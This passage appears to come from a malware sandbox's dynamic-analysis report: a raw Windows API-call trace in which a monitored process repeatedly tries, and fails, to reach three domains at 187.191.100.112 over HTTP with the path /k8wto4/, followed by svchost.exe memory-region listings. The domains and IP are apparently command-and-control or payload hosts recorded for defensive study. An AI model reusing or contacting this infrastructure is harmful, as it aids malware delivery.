dwCmpFlags=0x1, lpString1="http", cchCount1=4, lpString2="HTTPS", cchCount2=5) returned 1 [0356.556] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x534d9fd, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="û)", lpUsedDefaultChar=0x0) returned 0 [0356.556] socket (af=2, type=1, protocol=0) returned 0x9e0 [0356.556] getsockopt (in: s=0x9e0, level=65535, optname=4104, optval=0x534dac4, optlen=0x534dac0 | out: optval="\x01", optlen=0x534dac0) returned 0 [0356.556] getsockopt (in: s=0x9e0, level=6, optname=1, optval=0x534dac4, optlen=0x534dac0 | out: optval="", optlen=0x534dac0) returned 0 [0356.556] setsockopt (s=0x9e0, level=65535, optname=4, optval="", optlen=4) returned 0 [0356.556] htons (hostshort=0x0) returned 0x0 [0356.557] bind (s=0x9e0, addr=0x534da24*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0356.557] getsockname (in: s=0x9e0, name=0x534da18, namelen=0x534da98 | out: name=0x534da18*(sa_family=2, sin_port=0xc009, sin_addr="0.0.0.0"), namelen=0x534da98) returned 0 [0356.557] htons (hostshort=0x9c0) returned 0xc009 [0356.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bandeivacomercio.com", cchCount1=20, lpString2="LOCALHOST", cchCount2=9) returned 1 [0356.557] IdnToAscii (in: dwFlags=0x0, lpUnicodeCharStr="bandeivacomercio.com", cchUnicodeChar=20, lpASCIICharStr=0x0, cchASCIIChar=0 | out: lpASCIICharStr=0x0) returned 20 [0356.557] IdnToAscii (in: dwFlags=0x0, lpUnicodeCharStr="bandeivacomercio.com", cchUnicodeChar=20, lpASCIICharStr=0x6391f3c, cchASCIIChar=20 | out: lpASCIICharStr="bandeivacomercio.com") returned 20 [0356.557] GetAddrInfoW (in: pNodeName="bandeivacomercio.com", pServiceName=0x0, pHints=0x534dacc, ppResult=0x534daec | out: ppResult=0x534daec) returned 0 [0356.562] FreeAddrInfoW (pAddrInfo=0x312fe0) [0356.562] htons (hostshort=0x50) returned 0x5000 [0356.562] connect (s=0x9e0, name=0x534da7c*(sa_family=2, sin_port=0x50, sin_addr="187.191.100.112"), namelen=16) returned -1 [0377.576] WSAGetLastError () returned 10060 [0377.576] LoadStringW (in: hInstance=0x5fc0000, uID=0xfeaa, lpBuffer=0x534b9a8, cchBufferMax=4096 | out: lpBuffer="Connection timed out.") returned 0x15 [0377.576] LoadStringW (in: hInstance=0x5fc0000, uID=0xfeca, lpBuffer=0x534b9a4, cchBufferMax=4096 | out: lpBuffer="Socket Error # %d\r\n%s") returned 0x15 [0377.576] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x534da0c) [0377.577] RtlUnwind (TargetFrame=0x534db58, TargetIp=0x5fc8130, ExceptionRecord=0x534d52c, ReturnValue=0x0) [0377.578] shutdown (s=0x9e0, how=1) returned -1 [0377.578] closesocket (s=0x9e0) returned 0 [0377.578] GetCurrentThreadId () returned 0x62c [0377.578] GetCurrentThreadId () returned 0x62c [0377.578] GetCurrentThreadId () returned 0x62c [0377.578] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x534d285, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 0 [0377.578] GetCurrentThreadId () returned 0x62c [0377.578] GetCurrentThreadId () returned 0x62c [0377.578] GetCurrentThreadId () returned 0x62c [0377.581] RtlUnwind (TargetFrame=0x534dcd4, TargetIp=0x5fc8130, ExceptionRecord=0x534d52c, ReturnValue=0x0) [0377.583] PeekMessageW (in: lpMsg=0x534f944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x534f944) returned 1 [0377.583] IsWindowUnicode (hWnd=0x10132) returned 1 [0377.583] PeekMessageW (in: lpMsg=0x534f944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x534f944) returned 1 [0377.583] GetCapture () returned 0x0 [0377.583] GetWindowThreadProcessId (in: hWnd=0x10132, lpdwProcessId=0x534f908 | out: lpdwProcessId=0x534f908) returned 0x62c [0377.583] GetCurrentProcessId () returned 0x470 [0377.583] GlobalFindAtomW (lpString="ControlOfs05FC00000000062C") returned 0xc02f [0377.583] GetPropW (hWnd=0x10132, lpString=0xc02f) returned 0x0 [0377.583] GetParent (hWnd=0x10132) returned 0x0 [0377.583] TranslateMessage (lpMsg=0x534f944) returned 0 [0377.583] DispatchMessageW (lpMsg=0x534f944) [0377.583] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x534f5c5, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\x1d\x06ìõ4\x05<*\x1d\x06äõ4\x05\x88Ù\x15\x06ðø0\x06", lpUsedDefaultChar=0x0) returned 0 [0377.583] GetCurrentThreadId () returned 0x62c [0377.583] GetCurrentThreadId () returned 0x62c [0377.583] GetCurrentThreadId () returned 0x62c [0377.583] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0377.583] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0377.583] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0377.583] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".", cchCount1=1, lpString2="@", cchCount2=1) returned 1 [0377.583] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0377.583] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="d", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0377.583] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0377.583] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0377.584] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0377.584] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0377.584] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0377.584] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0377.584] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0377.584] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="r", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0377.584] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0377.584] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0377.584] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0377.584] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0377.584] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0377.584] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0377.584] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".", cchCount1=1, lpString2="/", cchCount2=1) returned 1 [0377.584] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0377.584] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="w", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0377.584] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0377.584] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="k", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0377.584] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="/", cchCount1=1, lpString2="/", cchCount2=1) returned 2 [0377.584] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="/k8wto4/", cchCount1=1, lpString2="/", cchCount2=1) returned 2 [0377.584] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="http", cchCount1=4, lpString2="http", cchCount2=4) returned 2 [0377.584] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="OPTIONS", cchCount2=7) returned 1 [0377.584] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="OPTIONS", cchCount2=7) returned 1 [0377.584] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="TRACE", cchCount2=5) returned 1 [0377.584] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="PUT", cchCount2=3) returned 1 [0377.584] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="OPTIONS", cchCount2=7) returned 1 [0377.584] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="DELETE", cchCount2=6) returned 3 [0377.584] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="TRACE", cchCount2=5) returned 1 [0377.585] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="PUT", cchCount2=3) returned 1 [0377.585] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="OPTIONS", cchCount2=7) returned 1 [0377.585] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="DELETE", cchCount2=6) returned 1 [0377.585] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="http", cchCount1=4, lpString2="http", cchCount2=4) returned 2 [0377.585] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="carvas32ltda.com", cchCount2=16) returned 1 [0377.585] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="http", cchCount1=4, lpString2="HTTPS", cchCount2=5) returned 1 [0377.585] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x534f441, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="û)", lpUsedDefaultChar=0x0) returned 0 [0377.585] socket (af=2, type=1, protocol=0) returned 0x9e0 [0377.585] getsockopt (in: s=0x9e0, level=65535, optname=4104, optval=0x534f508, optlen=0x534f504 | out: optval="\x01", optlen=0x534f504) returned 0 [0377.585] getsockopt (in: s=0x9e0, level=6, optname=1, optval=0x534f508, optlen=0x534f504 | out: optval="", optlen=0x534f504) returned 0 [0377.585] setsockopt (s=0x9e0, level=65535, optname=4, optval="", optlen=4) returned 0 [0377.585] htons (hostshort=0x0) returned 0x0 [0377.586] bind (s=0x9e0, addr=0x534f468*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0377.586] getsockname (in: s=0x9e0, name=0x534f45c, namelen=0x534f4dc | out: name=0x534f45c*(sa_family=2, sin_port=0xc00a, sin_addr="0.0.0.0"), namelen=0x534f4dc) returned 0 [0377.586] htons (hostshort=0xac0) returned 0xc00a [0377.586] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="carvas32ltda.com", cchCount1=16, lpString2="LOCALHOST", cchCount2=9) returned 1 [0377.586] IdnToAscii (in: dwFlags=0x0, lpUnicodeCharStr="carvas32ltda.com", cchUnicodeChar=16, lpASCIICharStr=0x0, cchASCIIChar=0 | out: lpASCIICharStr=0x0) returned 16 [0377.586] IdnToAscii (in: dwFlags=0x0, lpUnicodeCharStr="carvas32ltda.com", cchUnicodeChar=16, lpASCIICharStr=0x637c5a4, cchASCIIChar=16 | out: lpASCIICharStr="carvas32ltda.com") returned 16 [0377.586] GetAddrInfoW (in: pNodeName="carvas32ltda.com", pServiceName=0x0, pHints=0x534f510, ppResult=0x534f530 | out: ppResult=0x534f530) returned 0 [0377.592] FreeAddrInfoW (pAddrInfo=0x5717918) [0377.592] htons (hostshort=0x50) returned 0x5000 [0377.592] connect (s=0x9e0, name=0x534f4c0*(sa_family=2, sin_port=0x50, sin_addr="187.191.100.112"), namelen=16) returned -1 [0398.636] WSAGetLastError () returned 10060 [0398.636] LoadStringW (in: hInstance=0x5fc0000, uID=0xfeaa, lpBuffer=0x534d3ec, cchBufferMax=4096 | out: lpBuffer="Connection timed out.") returned 0x15 [0398.636] LoadStringW (in: hInstance=0x5fc0000, uID=0xfeca, lpBuffer=0x534d3e8, cchBufferMax=4096 | out: lpBuffer="Socket Error # %d\r\n%s") returned 0x15 [0398.636] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x534f450) [0398.637] RtlUnwind (TargetFrame=0x534f59c, TargetIp=0x5fc8130, ExceptionRecord=0x534ef6c, ReturnValue=0x0) [0398.638] shutdown (s=0x9e0, how=1) returned -1 [0398.638] closesocket (s=0x9e0) returned 0 [0398.640] GetCurrentThreadId () returned 0x62c [0398.640] GetCurrentThreadId () returned 0x62c [0398.640] GetCurrentThreadId () returned 0x62c [0398.640] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x534ecc5, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=">,\x06\x0cí4\x05a@\x1a\x06 >,\x06\x13\x08\x1a\x06äì4\x05§\x84ü\x05\x0cí4\x05\x14í4\x05\x8c\x83ü\x05\x0cí4\x05\x88Ù\x15\x06ðø0\x06ðø0\x06Öô\x19\x068í4\x05", lpUsedDefaultChar=0x0) returned 0 [0398.640] GetCurrentThreadId () returned 0x62c [0398.640] GetCurrentThreadId () returned 0x62c [0398.640] GetCurrentThreadId () returned 0x62c [0398.643] RtlUnwind (TargetFrame=0x534f718, TargetIp=0x5fc8130, ExceptionRecord=0x534ef6c, ReturnValue=0x0) [0398.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0398.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0398.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0398.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".", cchCount1=1, lpString2="@", cchCount2=1) returned 1 [0398.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0398.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0398.646] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0398.646] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0398.646] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0398.646] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0398.646] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0398.646] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="r", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0398.646] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0398.646] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0398.646] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0398.646] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0398.646] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0398.646] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0398.646] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".", cchCount1=1, lpString2="/", cchCount2=1) returned 1 [0398.646] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0398.646] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="w", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0398.647] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0398.647] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="k", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0398.647] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="/", cchCount1=1, lpString2="/", cchCount2=1) returned 2 [0398.647] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="/k8wto4/", cchCount1=1, lpString2="/", cchCount2=1) returned 2 [0398.647] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="http", cchCount1=4, lpString2="http", cchCount2=4) returned 2 [0398.647] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="OPTIONS", cchCount2=7) returned 1 [0398.647] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="OPTIONS", cchCount2=7) returned 1 [0398.647] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="TRACE", cchCount2=5) returned 1 [0398.647] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="PUT", cchCount2=3) returned 1 [0398.647] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="OPTIONS", cchCount2=7) returned 1 [0398.647] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="DELETE", cchCount2=6) returned 3 [0398.647] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="TRACE", cchCount2=5) returned 1 [0398.647] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="PUT", cchCount2=3) returned 1 [0398.647] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="OPTIONS", cchCount2=7) returned 1 [0398.647] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="DELETE", cchCount2=6) returned 1 [0398.648] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="http", cchCount1=4, lpString2="http", cchCount2=4) returned 2 [0398.648] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="carvas32ltda.com", cchCount1=16, lpString2="carva32ssa.com", cchCount2=14) returned 3 [0398.648] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="http", cchCount1=4, lpString2="HTTPS", cchCount2=5) returned 1 [0398.648] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x534eb7d, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="û)", lpUsedDefaultChar=0x0) returned 0 [0398.648] socket (af=2, type=1, protocol=0) returned 0x9e0 [0398.649] getsockopt (in: s=0x9e0, level=65535, optname=4104, optval=0x534ec44, optlen=0x534ec40 | out: optval="\x01", optlen=0x534ec40) returned 0 [0398.649] getsockopt (in: s=0x9e0, level=6, optname=1, optval=0x534ec44, optlen=0x534ec40 | out: optval="", optlen=0x534ec40) returned 0 [0398.649] setsockopt (s=0x9e0, level=65535, optname=4, optval="", optlen=4) returned 0 [0398.649] htons (hostshort=0x0) returned 0x0 [0398.649] bind (s=0x9e0, addr=0x534eba4*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0398.649] getsockname (in: s=0x9e0, name=0x534eb98, namelen=0x534ec18 | out: name=0x534eb98*(sa_family=2, sin_port=0xc00b, sin_addr="0.0.0.0"), namelen=0x534ec18) returned 0 [0398.650] htons (hostshort=0xbc0) returned 0xc00b [0398.650] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="carva32ssa.com", cchCount1=14, lpString2="LOCALHOST", cchCount2=9) returned 1 [0398.650] IdnToAscii (in: dwFlags=0x0, lpUnicodeCharStr="carva32ssa.com", cchUnicodeChar=14, lpASCIICharStr=0x0, cchASCIIChar=0 | out: lpASCIICharStr=0x0) returned 14 [0398.650] IdnToAscii (in: dwFlags=0x0, lpUnicodeCharStr="carva32ssa.com", cchUnicodeChar=14, lpASCIICharStr=0x6366f0c, cchASCIIChar=14 | out: lpASCIICharStr="carva32ssa.com") returned 14 [0398.650] GetAddrInfoW (in: pNodeName="carva32ssa.com", pServiceName=0x0, pHints=0x534ec4c, ppResult=0x534ec6c | out: ppResult=0x534ec6c) returned 0 [0398.674] FreeAddrInfoW (pAddrInfo=0x56e3f90) [0398.674] htons (hostshort=0x50) returned 0x5000 [0398.674] connect (s=0x9e0, name=0x534ebfc*(sa_family=2, sin_port=0x50, sin_addr="187.191.100.112"), namelen=16) Thread: id = 145 os_tid = 0x66c [0269.714] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x2f33960 Thread: id = 146 os_tid = 0x670 [0269.735] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x2fb4f40 Thread: id = 155 os_tid = 0x6a0 [0272.923] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x2fb3608 Thread: id = 156 os_tid = 0x6a8 [0273.384] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x2fb3578 Thread: id = 157 os_tid = 0x6b4 [0274.317] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x2fb06e0 [0274.318] LocalFree (hMem=0x2fb06e0) returned 0x0 Thread: id = 158 os_tid = 0x6c4 [0275.175] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x330aa8 Thread: id = 159 os_tid = 0x6c8 [0275.808] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3310c0 Thread: id = 160 os_tid = 0x6d0 [0277.409] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x566dbf8 Thread: id = 161 os_tid = 0x6d4 [0277.566] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x331438 Thread: id = 182 os_tid = 0x7c4 [0289.360] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x56e79c8 [0289.362] LocalFree (hMem=0x56e79c8) returned 0x0 Thread: id = 183 os_tid = 0x7c8 [0289.450] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x56e7d40 [0388.231] LocalFree (hMem=0x56e7d40) returned 0x0 Thread: id = 184 os_tid = 0x7dc [0289.872] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x56e7b48 [0363.017] LocalFree (hMem=0x56e7b48) returned 0x0 Thread: id = 185 os_tid = 0x7e4 [0290.020] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x56e7b60 [0365.127] LocalFree (hMem=0x56e7b60) returned 0x0 Thread: id = 205 os_tid = 0x918 [0295.450] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x280f88 [0366.422] LocalFree (hMem=0x280f88) returned 0x0 Thread: id = 210 os_tid = 0x954 [0297.292] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x5729af0 Thread: id = 242 os_tid = 0xa1c [0382.947] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x335db0 [0382.960] LocalFree (hMem=0x335db0) returned 0x0 Thread: id = 244 os_tid = 0xacc [0390.230] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x56e7c38 Thread: id = 246 os_tid = 0xb00 Process: id = "16" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x7f0a8200" os_pid = "0x3f0" monitor_reason = "rpc_server" parent_id = "15" os_parent_pid = "0x470" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService" cur_dir = "C:\\Windows\\system32\\" Region: id = 1810 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1811 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1812 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1813 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1814 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" Region: id = 1815 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 1816 start_va = 0x190000 end_va = 0x191fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 1817 start_va = 0x1a0000 end_va = 0x1a0fff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 1818 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 1819 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 1820 start_va = 0x1f0000 end_va = 0x1fffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 1821 start_va = 0x220000 end_va = 0x25ffff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 1822 start_va = 0x260000 end_va = 0x360fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 1823 start_va = 0x390000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 1824 start_va = 0x3d0000 end_va = 0x3d7fff entry_point = 0x3d2104 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" Region: id = 1825 start_va = 0x3e0000 end_va = 0x45ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 1826 start_va = 0x4a0000 end_va = 0x4dffff entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 1827 start_va = 0x520000 end_va = 0x61ffff entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 1828 start_va = 0x620000 end_va = 0xa12fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 1829 start_va = 0xa20000 end_va = 0xa9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a20000" filename = "" Region: id = 1830 start_va = 0xb40000 end_va = 0xb7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b40000" filename = "" Region: id = 1831 start_va = 0xbf0000 end_va = 0xc2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000bf0000" filename = "" Region: id = 1832 start_va = 0xc80000 end_va = 0xf4efff entry_point = 0xc80000 region_type = mapped_file name = "SortDefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" Region: id = 1833 start_va = 0xf50000 end_va = 0xf8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f50000" filename = "" Region: id = 1834 start_va = 0x72560000 end_va = 0x72567fff entry_point = 0x725611e5 region_type = mapped_file name = "nsisvc.dll" filename = "\\Windows\\System32\\nsisvc.dll" Region: id = 1835 start_va = 0x74010000 end_va = 0x74056fff entry_point = 0x740289f9 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" Region: id = 1836 start_va = 0x75520000 end_va = 0x7555afff entry_point = 0x7552128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" Region: id = 1837 start_va = 0x75780000 end_va = 0x75795fff entry_point = 0x75782dc3 region_type = mapped_file name = 